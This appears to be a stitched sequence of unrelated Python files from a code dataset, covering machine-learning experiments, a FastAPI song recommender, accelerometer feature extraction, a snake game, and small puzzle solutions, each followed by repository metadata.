    """
    return sum(list) / len(list)
def Folding_Loop(x, y):
    """5-fold CV: fit a 1-in/1-out linear model with SGD on MSE per fold.

    Uses the module-level `fold` (KFold) splitter.  Only the training split
    is actually fitted on; the test split is printed but never evaluated.
    """
    for train_index, test_index in fold.split(x):
        print(train_index, test_index)
        train_x = numpy.array(x)[train_index]
        train_y = numpy.array(y)[train_index]
        test_x = numpy.array(x)[test_index]
        test_y = numpy.array(y)[test_index]
        # neural net code here, get a loss value for this fold
        print(train_x, test_x)
        print(train_y, test_y)
        model = nn.Linear(1, 1)
        loss = nn.MSELoss()
        optimizer = torch.optim.SGD(model.parameters(),
                                    lr=0.001)  # lr = learning rate (step size of each update)
        # unsqueeze(1) turns the (N,) vector into an (N, 1) column tensor.
        x_touch = torch.tensor(train_x, dtype=torch.float32).unsqueeze(1)
        y_true_touch = torch.tensor(train_y, dtype=torch.float32).unsqueeze(1)
        print_count = 0
        for epoch in range(10):
            y_pred = model(x_touch)
            epoch_loss = loss(y_pred, y_true_touch)
            print("epoch loss #" + str(print_count) + ": " + str(epoch_loss))
            optimizer.zero_grad()  # reset accumulated gradients
            epoch_loss.backward()  # backpropagate the error
            optimizer.step()       # gradient-descent update of the weights
            print_count = print_count + 1
# df = pd.read_csv("heights_M.csv")
# x1 = df["Age (in months)"].values.tolist()
# x2 = df["3rd Percentile Length (in centimeters)"].values.tolist()
# x3 = df["5th Percentile Length (in centimeters)"].values.tolist()
# x4 = df["10th Percentile Length (in centimeters)"].values.tolist()
# x5 = df["25th Percentile Length (in centimeters)"].values.tolist()
# True_Y = df["50th Percentile Length (in centimeters)"].values.tolist()
df = pd.read_csv("video_games_sales.csv")
True_Y = df["Global_Sales"].values.tolist()
nlp = spacy.load("en_core_web_sm")
# df_crit = df["Critic_Score"].values.tolist() #Average = 69
# df_pub = df["Publisher"].values.tolist()
# df_userscore = df["User_Score"].values.tolist() #Average = 7.1
# df_genre = df["Genre"].values.tolist()
# df_names = df["Name"].values.tolist()
# df_usercount = df["User_Count"].values.tolist() #Average = 162
# df_critcount = df["Critic_Count"].values.tolist() #Average = 26
df['Critic_Score'] = df['Critic_Score'].replace(numpy.nan, 69)
df['User_Score'] = df['User_Score'].replace(numpy.nan, 7.1)
df['Critic_Count'] = df['Critic_Count'].replace(numpy.nan, 26)
df['User_Count'] = df['User_Count'].replace(numpy.nan, 162)
df_cats = df[["Name", "Genre", "Publisher", "Critic_Score", "Critic_Count", "User_Score", "User_Count"]]
df_list = df_cats.values.tolist()
# df_cats = pd.get_dummies(df_cats)
# print(df_cats[0])
# print()
print(pd.get_dummies(df_cats))
print_c = 0
for row in df_list:
print(row)
print_c+= 1
if print_c == 10:
break
# for token in df_cats:
# print(token)
# vocabulary = set()
# for genre in genres:
# doc = nlp(str(genre))
# for token in doc:
# print(token.text)
# vocabulary.add(token.text)
#
# for genre in genres:
# doc = nlp(str(genre))
# word_frequency = {}
# for token in doc:
# if token.text in word_frequency:
# word_frequency[token.text] += 1
# else:
# word_frequency[token.text] = 1
# # print(word_frequency)
# bag = []
# for w in sorted(vocabulary):
# if w in word_frequency:
# bag.append(word_frequency[w])
# else:
# bag.append(0)
# print(bag)
#
#
# t = torch.tensor(bag)
# print(t)
#
# t2 = torch.tensor([2,25,42])
# t3 = torch.cat([t,t2])
# print(t3)
print("TRUE Y: 50TH%")
print(True_Y)
# print("\nX1*********")
# print(x1)
# Folding_Loop(x1, True_Y)
#
# print("\nx2*********")
# print(x2)
# Folding_Loop(x2, True_Y)
#
# print("\nx3*********")
# print(x3)
# Folding_Loop(x3, True_Y)
#
# print("\nx4*********")
# print(x4)
# Folding_Loop(x4, True_Y)
#
# print("\nx5*********")
# print(x5)
# Folding_Loop(x5, True_Y)
| Orgzales/AI-Test-Data | experiment.py | experiment.py | py | 4,858 | python | en | code | 0 | github-code | 90 |
5346084226 | #!/usr/bin/env python
# python=
for i in range(int(input())):
    print(f"Case #{i+1}:")
    ans_list = []
    # Read the data: 10 (url, count) pairs per case.
    for n in range(10):
        url,a = input().split(" ")
        ans_list.append([int(a),url])
    # Find the maximum count and print every url that reaches it.
    # (Lists compare element-wise, so max() keys on the count first.)
    # NOTE(review): the inner loop reuses `i`, shadowing the case index.
    max_math = max(ans_list)[0]
    for i in ans_list :
        if i[0] == max_math:
            print(i[1])
| 10946009/upload_data | 特殊測資/U8/zj-a130/dom/ans.py | ans.py | py | 323 | python | en | code | 0 | github-code | 90 |
36845526850 | import numpy as np
import pandas as pd
import glob
import re
import os
from scipy import stats
import sys
sys.path.insert(1,'/scratch/c.c21013066/software/biobankAccelerometerAnalysis/accelerometer')
import utils
data_path='/scratch/c.c21013066/data/ukbiobank/sample/withGP/'
save_path1='/scratch/c.c21013066/data/ukbiobank/phenotypes/accelerometer/'
save_path='/scratch/scw1329/annkathrin/data/ukbiobank/accelerometer/'
# run through given folder and extract features and save
folder = sys.argv[1]
print(folder)
filenames = pd.read_csv(f'{save_path1}/subject_file_lookup.csv')
filenames = filenames[filenames['path']==folder]
#eids = pd.read_csv('/scratch/scw1329/annkathrin/data/ukbiobank/to_process4.csv')
#eids = eids['eid']
#intersect = np.intersect1d(eids,filenames['eid'])
#filenames = filenames[filenames['eid'].isin(intersect)]
# index = int(sys.argv[1])
# length = filenames.shape[0]//25
# start = index*length
# print(index,start,start+length)
# if index<24:
# filenames = filenames.iloc[start:start+length,:]
# else:
# filenames = filenames.iloc[start:,:]
subjects_avail = filenames['eid']
#subjects = glob.glob(f"{folder}/*timeSeries.csv.gz")
classes = ['sleep','light','sedentary','MVPA','imputed']
cols = np.hstack(['covered_days','complete_days_starting_10h','complete_days_starting_0h','complete_days_starting_7h', [f'mean_{cl}_hours_perday' for cl in classes],
[f'std_{cl}_hours_perday' for cl in classes],
[f'mean_{cl}_hours_per24h' for cl in classes],
[f'std_{cl}_hours_per24h' for cl in classes],
[f'mean_movement_during_{cl}' for cl in classes],
[f'std_movement_during_{cl}' for cl in classes],
[f'mean_max_{cl}_hours_consecutive_perday' for cl in classes],
[f'mean_max_{cl}_hours_consecutive_per24h' for cl in classes],
[f'max_{cl}_hours_consecutive' for cl in classes],
[f'mean_N_{cl}_intervals_per24h' for cl in classes],
[f'mean_N_{cl}_intervals_perday' for cl in classes],
[f'mean_N_{cl}_intervals_22-10' for cl in classes],
[f'mean_N_{cl}_intervals_10-22' for cl in classes],
[f'mean_N_{cl}_intervals_07-23' for cl in classes],
[f'mean_N_{cl}_intervals_23-07' for cl in classes]])
sum_sleep_raw = pd.DataFrame(index=subjects_avail,columns=cols)
thr = 2878 # last day stops for all 30sec early, so allow for 1 min to be missing each hour
for eid,file in zip(subjects_avail,filenames['file']):
# check where eid is in foldersystem
data_raw = pd.read_csv(file)
data_raw['time'] = data_raw['time'].apply(utils.date_parser)
data_raw = data_raw.set_index('time')
# check how much time coverage
sum_sleep_raw.loc[eid,f'covered_days'] = (data_raw.index[-1] - data_raw.index[0]) / np.timedelta64(1,'D')
sum_sleep_raw.loc[eid,f'complete_days_starting_10h'] = (data_raw.groupby(pd.Grouper(freq='24h', offset='10h', label='left')).size() >= thr).sum() # remove incomplete ones
sum_sleep_raw.loc[eid,f'complete_days_starting_0h'] = (data_raw.groupby(pd.Grouper(freq='24h', label='left')).size() >= thr).sum() # remove first and last day and all incomplete ones
sum_sleep_raw.loc[eid,f'complete_days_starting_7h'] = (data_raw.groupby(pd.Grouper(freq='24h', offset='7h',label='left')).size() >= thr).sum() # remove first and last day and all incomplete ones
data_full = data_raw.groupby(pd.Grouper(freq='24h', label='left')).filter(lambda x: len(x) >= thr )
data_full_10h = data_raw.groupby(pd.Grouper(freq='24h', offset='10h',label='left')).filter(lambda x: len(x) >=thr )
data_full_7h = data_raw.groupby(pd.Grouper(freq='24h', offset='7h',label='left')).filter(lambda x: len(x) >= thr )
for cl in classes:
#sum_sleep_raw.loc[eid,f'total_{cl}_hours'] = data[cl].sum() # invalid as biased by how long people wore it
# data recorded in 30sec intervals where then label is given
# to get hours of sleep per day, we have to sum 30sec labels per day and divide by 60*2 # remove first and last day
sum_sleep_raw.loc[eid,f'mean_{cl}_hours_perday'] = (data_full.groupby([data_full.index.date])[cl].sum()/120).mean()
sum_sleep_raw.loc[eid,f'std_{cl}_hours_perday'] = (data_full.groupby([data_full.index.date])[cl].sum()/120).std()
# instead use 24h intervals from first 10h to last 10h
sum_sleep_raw.loc[eid,f'mean_{cl}_hours_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[cl].sum()/120).mean()
sum_sleep_raw.loc[eid,f'std_{cl}_hours_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[cl].sum()/120).std()
sum_sleep_raw.loc[eid,f'mean_movement_during_{cl}'] = data_raw.loc[data_raw[cl]>0,'acc'].mean()
sum_sleep_raw.loc[eid,f'std_movement_during_{cl}'] = data_raw.loc[data_raw[cl]>0,'acc'].std()
# how often wake up during sleep
# identify sleep window and count
data_raw[f'consec_{cl}'] = data_raw[cl] * (data_raw.groupby((data_raw[cl] != data_raw[cl].shift()).cumsum()).cumcount() + 1)
data_full[f'consec_{cl}'] = data_full[cl] * (data_full.groupby((data_full[cl] != data_full[cl].shift()).cumsum()).cumcount() + 1)
data_full_10h[f'consec_{cl}'] = data_full_10h[cl] * (data_full_10h.groupby((data_full_10h[cl] != data_full_10h[cl].shift()).cumsum()).cumcount() + 1)
data_full_7h[f'consec_{cl}'] = data_full_7h[cl] * (data_full_7h.groupby((data_full_7h[cl] != data_full_7h[cl].shift()).cumsum()).cumcount() + 1)
sum_sleep_raw.loc[eid,f'mean_max_{cl}_hours_consecutive_perday'] = (data_full.groupby(pd.Grouper(freq='24h',label='left'))[f'consec_{cl}'].max()/120).mean()
sum_sleep_raw.loc[eid,f'mean_max_{cl}_hours_consecutive_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[f'consec_{cl}'].max()/120).mean()
sum_sleep_raw.loc[eid,f'max_{cl}_hours_consecutive'] = data_raw[f'consec_{cl}'].max()/120
# how often asleep during 24h?
data_raw[f'starts_{cl}'] = data_raw[f'consec_{cl}'] == 1
data_full[f'starts_{cl}'] = data_full[f'consec_{cl}'] == 1
data_full_10h[f'starts_{cl}'] = data_full_10h[f'consec_{cl}'] == 1
data_full_7h[f'starts_{cl}'] = data_full_7h[f'consec_{cl}'] == 1
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[f'starts_{cl}'].sum()).mean()
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_perday'] = (data_full.groupby(pd.Grouper(freq='24h', label='left'))[f'starts_{cl}'].sum()).mean()
# how often nap during day?
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_22-10'] = (data_full_10h.groupby(pd.Grouper(freq='12h', offset='10h', label='left'))[f'starts_{cl}'].sum())[1::2].mean()
# how often awake during night?
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_10-22'] = (data_full_10h.groupby(pd.Grouper(freq='12h', offset='10h', label='left'))[f'starts_{cl}'].sum())[::2].mean()
# alternative definition of day/night
# as recording starts at 10am and ends at 10am, need to cutoff incomplete ones
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_23-07'] = (data_full_7h.groupby(pd.Grouper(freq='8h', offset='7h', label='left'))[f'starts_{cl}'].sum())[2::3].mean()
first_8h = data_full_7h.groupby(pd.Grouper(freq='8h', offset='7h', label='left'))[f'starts_{cl}'].sum()[::3]
second_8h = data_full_7h.groupby(pd.Grouper(freq='8h', offset='7h', label='left'))[f'starts_{cl}'].sum()[1::3]
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_07-23'] = (first_8h.values + second_8h.values).mean()
# acceleration shortly before waking up
# select 2min (4 instances) before last sleep label and calculate acc mean
print(sum_sleep_raw.describe())
sum_sleep_raw.to_csv(f'/scratch/c.c21013066/data/ukbiobank/phenotypes/accelerometer/allsubject25_summary_from_raw.csv')
#sum_sleep_raw.to_csv(f'/scratch/c.c21013066/data/ukbiobank/phenotypes/accelerometer/allsubject{index}_summary_from_raw.csv')
#sum_sleep_raw.to_csv(f'{folder}/summary_fromraw.csv')
#sum_sleep_raw.to_csv(f'/scratch/scw1329/annkathrin/data/ukbiobank/accelerometer/to_process3/summary_fromraw.csv') | aschalkamp/UKBBprodromalPD | analyses/1_download_preprocess/feature_extraction_parallel.py | feature_extraction_parallel.py | py | 8,395 | python | en | code | 8 | github-code | 90 |
14227552248 | #
# Imports
#
import os
from turtle import Turtle, Screen
import time
#
# Classes
#
#
# Global variables
#
#
# Private functions
#
# clear_console
def clear_console():
    """Clear the terminal screen: 'cls' on Windows/DOS, 'clear' elsewhere."""
    is_windows = os.name in ("nt", "dos")
    os.system("cls" if is_windows else "clear")
#
# main
#
if __name__ == "__main__":
    # Clear console
    clear_console()
    #
    # Screen
    #
    # Create Screen
    screen = Screen()
    # Configure Height and Width
    screen.setup(width=600, height=600)
    # Configure background colour
    screen.bgcolor("black")
    # Configure window title
    screen.title("Snakey")
    #
    # Snake
    #
    game_is_on = True
    # FIX: starting_positions and segments were referenced below but never
    # defined, which raised NameError at runtime. The positions mirror the
    # previously commented-out "hard way" setup: three 20px squares laid
    # out leftwards from the origin.
    starting_positions = [(0, 0), (-20, 0), (-40, 0)]
    segments = []
    # Step 1: build the snake, one square turtle per segment
    for position in starting_positions:
        # Create turtle
        new_segment = Turtle("square")
        # Change colour
        new_segment.color("white")
        # Pen up so movement does not draw lines
        new_segment.penup()
        # Move turtle into place
        new_segment.goto(position)
        # Add to turtles list
        segments.append(new_segment)
    # Main game loop (runs until the window is closed)
    while game_is_on:
        # Update graphics
        screen.update()
        # Delay so the snake moves at a visible speed
        time.sleep(0.1)
        # Step 2: move snakey forward -- each tail segment steps into the
        # spot of the segment ahead of it (back to front), then the head moves.
        for seg_num in range(len(segments) - 1, 0, -1):
            # Replace segment with the position of the one ahead of it
            segments[seg_num].goto(
                segments[seg_num - 1].xcor(), segments[seg_num - 1].ycor()
            )
        # Move first segment (the head)
        segments[0].forward(20)
    # Exit screen (unreachable while game_is_on stays True)
    screen.exitonclick()
| fjpolo/Udemy100DaysOfCodeTheCompletePyhtonProBootcamp | Day020_021/main001.py | main001.py | py | 2,097 | python | en | code | 8 | github-code | 90 |
41153212150 | from fastapi import FastAPI
from gensim.models import Word2Vec
from pydantic import BaseModel
import logging
import json
from typing import List
from databases import Database
import os
import openai
import re
## 만들 함수
app = FastAPI()
logging.basicConfig(level=logging.INFO)
loaded_word2vec_model = Word2Vec.load('song2vec.model')
@app.get("/")
async def root():
    """Liveness endpoint: returns a static greeting."""
    return {"message": "Hello World"}
class InputData(BaseModel):
    """Request body for POST /process: a list of song master-number strings."""
    # Each entry is later cast with int(...) and matched against
    # song_song.master_number, so the strings are expected to be numeric.
    input_data: List[str]
# 1. DB 접근 (DTO)
# 데이터베이스 연결 URL 설정
fast_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
secrets_path = os.path.join(fast_dir,"secrets.json")
with open(secrets_path, 'r') as f:
secrets = json.load(f)
DATABASE_URL = secrets["DATABASE_URL"]
# gpt api
openai.organization = secrets["openai.organization"]
openai.api_key = secrets["openai.api_key"]
# 기본 데이터베이스 객체 생성
database = Database(DATABASE_URL)
@app.on_event("startup")
async def startup():
    """Open the shared `databases` connection when the app starts."""
    await database.connect()
@app.on_event("shutdown")
async def shutdown():
    """Release the database connection on shutdown."""
    await database.disconnect()
# @app.get("/test_db_connection")
# async def test_db_connection():
# # 데이터가 있는지 확인하려면 실제 테이블 이름으로 교체하세요.
# query = 'SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE master_number = 21'
# try:
# result = await database.fetch_one(query)
# if result is not None:
# return {"status": "success", "data": result}
# else:
# return {"status": "success", "data": "No rows found"}
# except Exception as e:
# return {"status": "error", "details": str(e)}
def record_to_dict(record):
    """Project a DB row onto the four public song fields."""
    fields = ("tj_song_num_id", "ky_song_num_id", "title", "artist")
    return {name: record[name] for name in fields}
@app.post("/process")
async def process_data(input_data: InputData):
    """Recommend 10 karaoke songs for a playlist of song master numbers.

    If any input id has a word2vec embedding, return the 10 most similar
    songs from the DB. Otherwise fall back to building a title-artist list
    for the playlist and asking the OpenAI completion API, then resolving
    the suggested titles against the DB.

    NOTE(review): the f-string SQL below is injection-prone (titles come
    straight from the OpenAI response) -- should be parameterized with
    `values=` placeholders.
    """
    logging.info(f"Received data: {input_data}")
    print(f"Received data: {input_data.input_data}")
    print(f"Received data type: {type(input_data)}")
    # Keep only ids the word2vec model has embeddings for.
    filtered_input_data = [word for word in input_data.input_data if word in loaded_word2vec_model.wv]
    if len(filtered_input_data) == 0:
        # Fallback path: no embeddings known -> describe the playlist to GPT.
        result_list = []
        for i in input_data.input_data:
            query = f'SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE master_number = {int(i)};'
            rows = await database.fetch_all(query=query)
            logging.info(f"comfirm: {rows}")
            for row in rows:
                song_title = row["title"]
                artist = row["artist"]
                result_list.append(f"{song_title}-{artist}")
        print(result_list)
        prompt = f"내 플레이리스트는 {result_list}이고, 내 플레이리스트 기반으로 부를 노래를 노래방에 있는 노래.가수 형식 10곡 추천해줘"
        response = openai.Completion.create(
            engine="text-davinci-003",
            prompt=prompt,
            temperature=0.5,
            max_tokens=1024,
            n=1,
            stop=None,
        )
        song_info = response.choices[0].text.strip().split('\n')
        print(song_info)
        collected_rows = []
        for song in song_info:
            song = re.sub(r'\d+\.','', song)
            # FIX: partition() instead of split('-') -- GPT lines with no
            # dash or with extra dashes in the title no longer raise
            # ValueError (which previously escaped the try below).
            title, _, _ = song.partition('-')
            title = title.replace(" ","").strip()
            print(title)
            try:
                query = f"SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE song_song.title = '{title}' LIMIT 1;"
                data = await database.fetch_one(query=query)
                collected_rows.append(data)
            except Exception as error:
                # FIX: previously logged the stale loop variable `i` from the
                # master-number loop above instead of the looked-up title.
                print(f"Error for title '{title}': {error}")
                continue
        # TODO: model refinement here, e.g. ChatGPT API / boosting cosine similarity
        print("필터링된 데이터가 없어 chat gpt가 응답합니다.")
        return {"result": collected_rows}
    else:
        # Embedding path: most-similar songs averaged over the known ids.
        similar_songs = loaded_word2vec_model.wv.most_similar(positive=filtered_input_data, topn=10)
        result = [i[0] for i in similar_songs]
        print(result)
        # Collect the matching DB rows for every recommended master number.
        collected_rows = []
        for i in result:
            query = f'SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE master_number = {int(i)};'
            rows = await database.fetch_all(query=query)
            print(rows)
            collected_rows.extend(rows)
        return {"result": collected_rows}
| OhJune/Client-Django-FastAPI | FastAPI/app/main.py | main.py | py | 5,001 | python | en | code | 1 | github-code | 90 |
42323378370 | def morse_time(time_string):
t = ''.join([i.zfill(2) for i in time_string.split(":")])
y = [2, 4, 3, 4, 3, 4]
x = [bin(int(t[i]))[2:].zfill(y[i]).replace('0','.').replace('1','-') for i in range(6)]
return "%s %s : %s %s : %s %s" % (x[0],x[1],x[2],x[3],x[4],x[5])
if __name__ == '__main__':
# These "asserts" using only for self-checking and not necessary for auto-testing
assert morse_time("10:37:49") == ".- .... : .-- .--- : -.. -..-", "First Test"
assert morse_time("21:34:56") == "-. ...- : .-- .-.. : -.- .--.", "Second Test"
assert morse_time("00:1:02") == ".. .... : ... ...- : ... ..-.", "Third Test"
assert morse_time("23:59:59") == "-. ..-- : -.- -..- : -.- -..-", "Fourth Test"
print("Coding complete? Click 'Check' to review your tests and earn cool rewards!")
| rawgni/empireofcode | morse_clock.py | morse_clock.py | py | 822 | python | en | code | 0 | github-code | 90 |
8580456839 | import os
from pprint import pprint
from datetime import datetime
def convert2ampm(time24: str) -> str:
    """Convert an 'HH:MM' 24-hour time string to 12-hour form like '09:34PM'."""
    parsed = datetime.strptime(time24, '%H:%M')
    return parsed.strftime('%I:%M%p')
os.chdir('D:\Learn/Python/buzzdata')
with open('buzzers.csv') as data:
ignore = data.readline #игнорировать заголовок
flights = {} #создать пустой словарь
for line in data:
k, v = line.strip().split(',')
flights[k] = v
#pprint(flights)
flights2 = {}
for k, v in flights.items(): #метод items возвращает элекменты словаря по одному
flights2[convert2ampm(k)] = v.title()
#pprint(flights2)
more_flights = {} #генератор словарей
more_flights = {convert2ampm(k): v.title() for k, v in flights.items()}
#pprint(more_flights)
just_freeport2 = {convert2ampm(k): v.title()
for k, v in flights.items()
if v == 'FREEPORT'}
#pprint(just_freeport2)
data = [ 1, 2, 3, 4, 5, 6, 7, 8 ]
evens = [num
for num in data
if not num % 2]
data = [ 1, 'one', 2, 'two', 3, 'three', 4, 'four' ]
words = [num for num in data if isinstance(num, str)]
data = list('So long and thanks for all the fish'.split())
title = [word.title() for word in data]
when = {}
for dest in set(flights.values()):
when[dest] = [k for k, v in flights.items() if v == dest]
when2 = {dest: [k for k, v in flights.items() if v == dest] for dest in set(flights.values())}
pprint(when2)
| Ve1l/python_book | test_format_csv.py | test_format_csv.py | py | 1,532 | python | en | code | 1 | github-code | 90 |
27709670916 |
# coding: utf-8
# In[ ]:
import keras
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
import matplotlib.pyplot as plt
import os
import numpy as np
batch_size = 32
num_classes = 10
epochs = 1
num_predictions = 20
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'keras_cifar10_trained_model.h5'
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
print("Training data:")
print( "Number of examples: ", X_train.shape[0])
print( "Number of channels:",X_train.shape[3] )
print( "Image size:", X_train.shape[1], X_train.shape[2])
print("\n")
print( "Test data:")
print( "Number of examples:", X_test.shape[0])
print( "Number of channels:", X_test.shape[3])
print( "Image size:",X_test.shape[1], X_test.shape[2])
plot = []
for i in range(1,10):
plot_image = X_train[100*i,:,:,:]
for j in range(1,10):
plot_image = np.concatenate((plot_image, X_train[100*i+j,:,:,:]), axis=1)
if i==1:
plot = plot_image
else:
plot = np.append(plot, plot_image, axis=0)
print(plot.shape, np.max(plot), np.min(plot))
plt.imshow(plot/255)
plt.axis('off')
plt.show()
print("mean before normalization:", np.mean(X_train))
print("std before normalization:", np.std(X_train))
# Per-channel standardization using training-set statistics; the test split
# reuses the train mean/std so both splits live in the same feature space.
# (Vectorized: replaces the previous per-channel Python loops and the
# intermediate np.ones buffers -- numerically identical via broadcasting.)
mean = np.mean(X_train, axis=(0, 1, 2))
std = np.std(X_train, axis=(0, 1, 2))
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
print("mean after normalization:", np.mean(X_train))
print("std after normalization:", np.std(X_train))
batchSize = 50 #-- Training Batch Size
num_classes = 10 #-- Number of classes in CIFAR-10 dataset
num_epochs = 10 #-- Number of epochs for training
learningRate= 0.001 #-- Learning rate for the network
lr_weight_decay = 0.95 #-- Learning weight decay. Reduce the learn rate by 0.95 after epoch
img_rows, img_cols = 32, 32 #-- input image dimensions
Y_train = np_utils.to_categorical(y_train, num_classes)
Y_test = np_utils.to_categorical(y_test, num_classes)
model = Sequential() #-- Sequential container.
model.add(Convolution2D(6, 5, 5, #-- 6 outputs (6 filters), 5x5 convolution kernel
border_mode='valid',
input_shape=( img_rows, img_cols, 3))) #-- 3 input depth (RGB)
model.add(Activation('relu')) #-- ReLU non-linearity
# model.add(Convolution2D(8, 5, 5)) #-- 16 outputs (16 filters), 5x5 convolution kernel
# model.add(Activation('relu')) #-- ReLU non-linearity
model.add(MaxPooling2D(pool_size=(2, 2)))
#-- A max-pooling on 2x2 windows
model.add(Convolution2D(16, 5, 5)) #-- 16 outputs (16 filters), 5x5 convolution kernel
model.add(Activation('relu')) #-- ReLU non-linearity
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Convolution2D(26, 5, 5)) #-- 26 outputs (16 filters), 5x5 convolution kernel
# model.add(Activation('relu')) #-- ReLU non-linearity
# model.add(MaxPooling2D(pool_size=(2, 2)))
# #-- A max-pooling on 2x2 windows
model.add(Flatten()) #-- eshapes a 3D tensor of 16x5x5 into 1D tensor of 16*5*5
model.add(Dense(120)) #-- 120 outputs fully connected layer
model.add(Activation('relu')) #-- ReLU non-linearity
model.add(Dense(84)) #-- 84 outputs fully connected layer
model.add(Activation('relu')) #-- ReLU non-linearity
model.add(Dense(num_classes)) #-- 10 outputs fully connected layer (one for each class)
model.add(Activation('softmax')) #-- converts the output to a log-probability. Useful for classification problems
print(model.summary())
sgd = SGD(lr=learningRate, decay = lr_weight_decay)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
#-- switch verbose=0 if you get error "I/O operation from closed file"
history = model.fit(X_train, Y_train, batch_size=batchSize, epochs=num_epochs,
verbose=1, shuffle=True, validation_data=(X_test, Y_test))
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
#-- summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
| sathisceg/Neural-network | problem_1_2_m.py | problem_1_2_m.py | py | 5,838 | python | en | code | 1 | github-code | 90 |
17079310013 | import aoc
ROCK = "A"
PAPER = "B"
SCISSOR = "C"
def getOutcome(myMove, opponentMove):
    """Rock-paper-scissors outcome points: 3 for a draw, 6 for a win, 0 otherwise."""
    if myMove == opponentMove:
        return 3
    beats = {ROCK: SCISSOR, SCISSOR: PAPER, PAPER: ROCK}
    # Win iff the opponent played the move ours beats; anything else scores 0.
    return 6 if beats.get(myMove) == opponentMove else 0
def getScore(myMove, opponentMove):
    """Total round score: shape value (rock 1 / paper 2 / scissors 3) plus outcome points."""
    shape_points = {ROCK: 1, PAPER: 2, SCISSOR: 3}
    return shape_points.get(myMove, 0) + getOutcome(myMove, opponentMove)
def translateMySymbolPart1(mySymbol):
    """Part 1 rules: X/Y/Z are just encoded moves; map them onto A/B/C."""
    return {"X": "A", "Y": "B", "Z": "C"}[mySymbol]
def translateMySymbolPart2(mySymbol, opponentMove):
    """Part 2 rules: X means lose, Y means draw, Z means win; derive the move to play."""
    if mySymbol == "Y":
        # Draw: mirror the opponent.
        return opponentMove
    if mySymbol == "X":
        # Lose: play the move the opponent's move beats.
        return {"A": "C", "B": "A", "C": "B"}[opponentMove]
    if mySymbol == "Z":
        # Win: play the move that beats the opponent's move.
        return {"A": "B", "B": "C", "C": "A"}[opponentMove]
data = aoc.getLinesForDay(2)
cumulativeSum1 = 0
cumulativeSum2 = 0
for line in data:
[opponentMove, mySymbol] = line.split(" ")
myMove1 = translateMySymbolPart1(mySymbol)
cumulativeSum1 += getScore(myMove1, opponentMove)
myMove2 = translateMySymbolPart2(mySymbol, opponentMove)
print(myMove2, opponentMove)
cumulativeSum2 += getScore(myMove2, opponentMove)
print("Part 1", cumulativeSum1)
print("Part 2", cumulativeSum2)
# Part 2 10318 too low (swapped the order of winDict and loseDict)
| tchapeaux/advent-of-code-2022 | day02.py | day02.py | py | 1,562 | python | en | code | 0 | github-code | 90 |
18271095839 | import sys
sys.setrecursionlimit(2147483647)
INF=float("inf")
MOD=10**9+7 # 998244353
input=lambda:sys.stdin.readline().rstrip()
def resolve():
    """Read a digit string and print the minimum total number of banknotes.

    DP over digits from least- to most-significant (hence the [::-1]):
    - ``just``: min notes so far when no carry is owed to the next digit
    - ``less``: min notes so far when the next digit must absorb a carry
      (we overpaid by one unit at this position)
    """
    just, less = 0, INF
    for d in input()[::-1]:
        d = int(d)
        # Either pay d notes directly, or pay on top of an incoming carry (d+1).
        njust = min(just + d, less + d + 1)
        # Or overpay: hand a note of the next denomination and take change --
        # costs 10-d notes (9-d if a carry was already pending).
        nless = min(just + (10-d), less + (9-d))
        just, less = njust, nless
    # A final pending carry needs one extra note of the top denomination.
    print(min(just, less + 1))
resolve() | Aasthaengg/IBMdataset | Python_codes/p02775/s323686619.py | s323686619.py | py | 382 | python | en | code | 0 | github-code | 90 |
34813172674 | import torch
from torch.nn import functional as F
from torch import nn
from .comm import compute_locations, aligned_bilinear
def dice_coefficient(x, target):
    """Soft Dice loss per instance; returns a 1-D tensor of length n_inst (0 = perfect overlap)."""
    eps = 1e-5
    n_inst = x.size(0)
    pred_flat = x.reshape(n_inst, -1)
    gt_flat = target.reshape(n_inst, -1)
    overlap = (pred_flat * gt_flat).sum(dim=1)
    # Squared-norm denominator with eps to avoid division by zero on empty masks.
    denom = (pred_flat ** 2.0).sum(dim=1) + (gt_flat ** 2.0).sum(dim=1) + eps
    return 1. - (2 * overlap / denom)
def parse_dynamic_params(params, channels, weight_nums, bias_nums):
    """Slice flat per-instance parameter vectors into conv weights and biases.

    ``params`` is a (num_insts, sum(weight_nums) + sum(bias_nums)) tensor; each
    row concatenates every layer's weights followed by every layer's biases.
    The splits are reshaped for grouped 1x1 conv2d (groups=num_insts), i.e.
    all instances are stacked along the output-channel axis.
    """
    assert params.dim() == 2
    assert len(weight_nums) == len(bias_nums)
